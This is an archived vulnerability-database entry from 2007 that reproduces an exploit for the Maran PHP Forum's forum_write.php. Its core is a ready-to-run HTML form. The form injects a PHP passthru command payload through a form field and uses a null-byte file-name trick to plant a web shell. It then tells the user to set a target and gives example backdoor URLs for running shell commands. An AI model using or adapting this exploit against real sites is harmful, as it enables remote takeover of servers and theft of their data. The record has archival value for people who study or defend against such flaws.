Lucene search
SecurityvulnsSECURITYVULNS:DOC:16902HistoryApr 30, 2007 - 12:00 a.m.
Maran PHP Forum (forum_write.php) Remote Code Execution Vulnerability
2007-04-3000:00:00
vulners.com
12
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
+ -
Y! Underground Group + -
+
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
+ -
Portal......: Maran PHP Forum + -
Author......: Dj7xpl / [email protected] + -
Type........: Remote Code Execution + -
Download....: http://www.maran.pamil-visions.com/maranforum.php + -
Page........: http://Dj7xpl.2600.ir + -
+
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
+ -
Xpl.........: + - <html><head><Title>—===Maran PHP Forum===------===Dj7xpl===—</title></head> +
- <body bgcolor="red"> +
- <center> +
- <form name="AimStats" method="post" action="http://site.com/path to site/forum_write.php"> +
- <input name="name" value="<?passthru($_GET[cmd])?>" type="text" > +
- <input name="page" value="pagename.php%00" type="text" > +
- <input type="submit" name="Submit" value="Submit" > +
- </form><br><br> +
- <font color="#C0FF3E" size="+1"> Please change Target And Run This Script</font><br> +
- <font color="#C0FF3E" size="+1"> Backdoor : http://[Target]/[Path]/data/pagename.php?cmd=shell</font></br> +
- <font color="#C0FF3E" size="+1"> E.g : http://site.com/forum/data/filename.php?cmd=ls -la</font> +
- </center> +
- </body> +
- </html> +
-
+ -
+
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-